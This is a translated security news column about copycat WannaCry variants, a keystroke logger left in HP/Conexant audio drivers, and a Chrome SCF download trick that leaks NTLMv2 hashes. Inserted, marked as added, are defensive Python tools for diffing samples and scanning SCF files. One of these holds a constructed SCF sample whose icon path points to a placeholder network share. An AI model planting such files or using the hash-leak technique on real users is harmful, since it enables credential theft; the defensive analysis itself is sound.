
Security Week 20: Fake WannaCry, HP ships a keylogger in its drivers, Chrome downloads too much

WannaCry has become so famous that even the least tech-literate part of the planet's population has heard something about it somewhere, and anyone with even a passing connection to information security has had time to work through the numerous analyses of the Trojan and the FAQs about it. No piece of malware has ever caused such a stir, so we now have the first Trojan superstar. And that popularity already has consequences.

Even the laziest admins have closed port 445 to the Internet (why it was open at all is another question) and rolled out the updates; many ordinary users did the same; our researchers and British ones sinkholed the kill-switch domains of several WannaCry variants. But it is impossible to stop the epidemic completely. Now it turns out that someone enterprising has jumped on the bandwagon and is trying to make a quick buck.

Sean Dillon of RiskSense reported that they had identified several new versions of WannaCry. They differ little from the original, and there is nothing encouraging about them: the only change is the address of the bitcoin wallet the ransom is to be sent to, crudely overwritten in a hex editor. There is one more tiny change: with the same rough editing of the file, the imitators disabled the Trojan's self-destruct mechanism, so these versions have no kill-switch domains at all.

An excellent business scheme: you don't have to do anything; you just tweak the sample and release it, and it feeds itself all over the world on its own. EternalBlue + DoublePulsar, and off it goes; nothing will stop it. The catch is that the victims of this wave won't get their files back even after paying the ransom: the copycats have no key to decrypt them. In principle, this is a good lesson for those who like to support the ransomware business by sending bitcoin, but the damage from this pseudo-WannaCry can be very serious.
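How does an analyst confirm that a "new version" is just the original with the wallet address overwritten in a hex editor? The following is an added example, not code from the column, and it works on constructed stand-ins rather than real malware: two equal-sized byte strings with placeholder strings for the ransom note, the wallet address and a kill-switch URL (the URL is a reserved `.invalid` name). It reports the byte ranges that differ and the printable strings that disappeared or appeared, which is exactly the kind of evidence behind "only the wallet address changed".

```python
"""Locate what a hex-edited copy of a sample changed relative to the original.
Added example; not code from the original column. Both byte strings below are
constructed stand-ins, not real malware."""
import re

STRING_RE = re.compile(rb"[\x20-\x7e]{8,}")   # printable ASCII runs of 8+ bytes


def printable_strings(blob: bytes) -> set:
    """Set of printable ASCII strings, the same view `strings` would give."""
    return set(STRING_RE.findall(blob))


def diff_runs(orig: bytes, patched: bytes, merge_gap: int = 4) -> list:
    """Byte ranges that differ, as (offset, old_bytes, new_bytes).
    Runs separated by at most merge_gap identical bytes are merged so that a
    replaced string shows up as one edit even if a few characters coincide."""
    if len(orig) != len(patched):
        raise ValueError("an in-place hex edit keeps the size; these files differ in length")
    runs = []
    for pos, (a, b) in enumerate(zip(orig, patched)):
        if a == b:
            continue
        if runs and pos - runs[-1][1] <= merge_gap:
            runs[-1][1] = pos + 1          # extend the current run
        else:
            runs.append([pos, pos + 1])    # start a new run
    return [(s, orig[s:e], patched[s:e]) for s, e in runs]


def compare_variants(orig: bytes, patched: bytes) -> dict:
    """Combine the byte-level diff with a string-level view of what was overwritten."""
    old_s, new_s = printable_strings(orig), printable_strings(patched)
    return {
        "runs": diff_runs(orig, patched),
        "removed_strings": sorted(old_s - new_s),
        "added_strings": sorted(new_s - old_s),
    }


# Constructed stand-ins: padding, a ransom note with a wallet address, a kill-switch URL.
ORIGINAL = (b"\x00" * 16
            + b"Send $300 to wallet: 1ORIGconstructedWalletAddr0000000" + b"\x00" * 8
            + b"http://killswitch.example.invalid/" + b"\x00" * 16)
# The copycat overwrote only the wallet address, keeping the length identical.
PATCHED = ORIGINAL.replace(b"1ORIGconstructedWalletAddr0000000",
                           b"1COPYconstructedWalletAddr9999999")

if __name__ == "__main__":
    for key, value in compare_variants(ORIGINAL, PATCHED).items():
        print(key, value)
```

On the constructed pair this yields two byte runs inside the wallet string (offsets 38 and 63) and one removed / one added printable string, while the kill-switch URL is untouched; on a real pair of samples the same output tells you whether anything beyond the wallet address was edited.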
A keylogger found in HP audio drivers

Here is the news. The Conexant audio driver shipped on some Hewlett-Packard computers logs every key the user presses and neatly writes the log to `C:\Users\Public\MicTray.log`. Nothing is encrypted.

Usually security people puzzle over "who is to blame" and "what to do", but this time the question is "WHY?!". The reason turned out to be the dumbest possible: the developers used the logging during debugging to catch bugs in hotkey handling, and forgot to turn it off.

The list of models with this "feature" is very extensive:


It is quite possible that someone figured this out long ago and has been using it for their own nefarious purposes. The reaction of Conexant and HP to the discovery was nil: when Thorsten Schröder of ModZero, who found the problem, tried to reach them, he got no answer from either. He had to publish a description of the "vulnerability" and a proof of concept, and only then did the vendors start moving.

But they moved in a peculiar way: the keystroke logging function stayed in the driver and was merely switched off via a registry key. ModZero recommends that owners of HP computers not wait for updates but simply delete `C:\Windows\System32\MicTray64.exe`, sacrificing the ability to control sound from the hotkeys, and of course delete the log itself.

Vulnerability in Chrome allows you to steal credentials

News. Research. If you think that Windows 10 with the latest updates and the latest version of Chrome will protect you from evil exploit sites, then... well, you know. Stop thinking that way, because DefenseCode has come up with a cunning attack through the most popular browser.

The problem is not a software bug but a configuration one: by default, Chrome downloads files it considers safe from websites without asking permission. That would seem harmless, since it doesn't run them, but SCF files (Explorer shell command files) are on the safe list. These are text files with two sections: one is a command executed on open, the other is the path to the file's icon. Explorer tries to fetch that icon automatically, again without asking the user, and the path can be a network path, somewhere on the Internet.

So what is dangerous here, if Explorer only tries to load the icon and does not execute anything? The danger is that while doing so it authenticates to the SMB server and hands over the username, domain and NTLMv2 password hash. An attacker can then try to crack the password (a matter of hours for a simple one), simply log in with that data to an external service that accepts NTLMv2, such as an Exchange server, or use it inside an already compromised network, where it is handy for privilege escalation. For Windows 8/10 users who sign in with a Microsoft account, this can lead to compromise of their accounts in OneDrive, Outlook.com, Office 365, Office Online, Skype and Xbox Live.

You can protect yourself from this attack by enabling the Chrome setting that asks where to save each file before downloading it. Other browsers, according to DefenseCode, do not download SCF files automatically.
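A defender-side check for the mechanism described above: SCF files are plain INI-style text, so a downloads folder can be scanned for ones whose icon path would make Explorer reach out over the network. The code below is an added example, not code from the column or from DefenseCode; the SCF samples are constructed (the benign one mirrors the classic "Show Desktop" file, the suspicious one uses a placeholder share on a reserved `.invalid` host), and `scan_folder` is a hypothetical helper name.

```python
"""Scan SCF (Explorer shell command) files for icon paths that point off-host.
Added example; not code from the original column. Sample SCF contents below are
constructed, and the share host name is a placeholder."""
import re
from pathlib import Path

SECTION_RE = re.compile(r"^\s*\[(?P<name>[^\]]+)\]\s*$")
KV_RE = re.compile(r"^\s*(?P<key>[^=;]+?)\s*=\s*(?P<val>.*?)\s*$")
UNC_RE = re.compile(r"^\\\\[^\\]+\\")          # \\host\share\...


def parse_scf(text: str) -> dict:
    """Minimal case-insensitive INI parser: {section: {key: value}}."""
    sections, current = {}, None
    for line in text.splitlines():
        m = SECTION_RE.match(line)
        if m:
            current = m.group("name").strip().lower()
            sections.setdefault(current, {})
            continue
        m = KV_RE.match(line)
        if m and current is not None:
            sections[current][m.group("key").lower()] = m.group("val")
    return sections


def remote_icon_paths(text: str) -> list:
    """Return (section, IconFile) pairs whose icon Explorer would fetch over the network."""
    hits = []
    for name, kv in parse_scf(text).items():
        icon = kv.get("iconfile", "")
        if UNC_RE.match(icon) or "://" in icon:
            hits.append((name, icon))
    return hits


def scan_folder(folder) -> dict:
    """Map each .scf file in a folder (e.g. Downloads) to its remote icon paths, if any."""
    findings = {}
    for path in Path(folder).glob("*.scf"):
        hits = remote_icon_paths(path.read_text(errors="replace"))
        if hits:
            findings[str(path)] = hits
    return findings


# Constructed samples: a benign "Show Desktop" style file and one with a network icon path.
BENIGN_SCF = ("[Shell]\r\nCommand=2\r\nIconFile=explorer.exe,3\r\n"
              "[Taskbar]\r\nCommand=ToggleDesktop\r\n")
SUSPECT_SCF = ("[Shell]\r\nCommand=2\r\n"
               "IconFile=\\\\files.example.invalid\\public\\icon.ico\r\n"
               "[Taskbar]\r\nCommand=ToggleDesktop\r\n")

if __name__ == "__main__":
    print("benign :", remote_icon_paths(BENIGN_SCF))
    print("suspect:", remote_icon_paths(SUSPECT_SCF))
```

The local icon reference (`explorer.exe,3`) produces no finding, while a UNC or URL icon path is reported with its section name; run `scan_folder` against a user's Downloads directory to catch such files before they are ever opened in Explorer.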

Antiquities


"V-944"

A dangerous non-resident virus. It usually infects .COM files in the current directory and in the directories listed in COMSPEC. It hooks int 16h (keyboard) and, depending on the characters typed, runs a smiley-face symbol (ASCII 1) along the 25th line of the screen from right to left and back. The face's movement is accompanied by a buzzing sound. Its int 16h handling is clumsy and can hang the system. It removes the read-only attribute and sets the file time's seconds field to 62.

Quote from the book "Computer Viruses in MS-DOS" by Eugene Kaspersky, 1992, page 89.

Disclaimer: this column reflects only the personal opinion of its author. It may or may not coincide with the position of Kaspersky Lab. It depends on luck.

Source: https://habr.com/ru/post/329098/
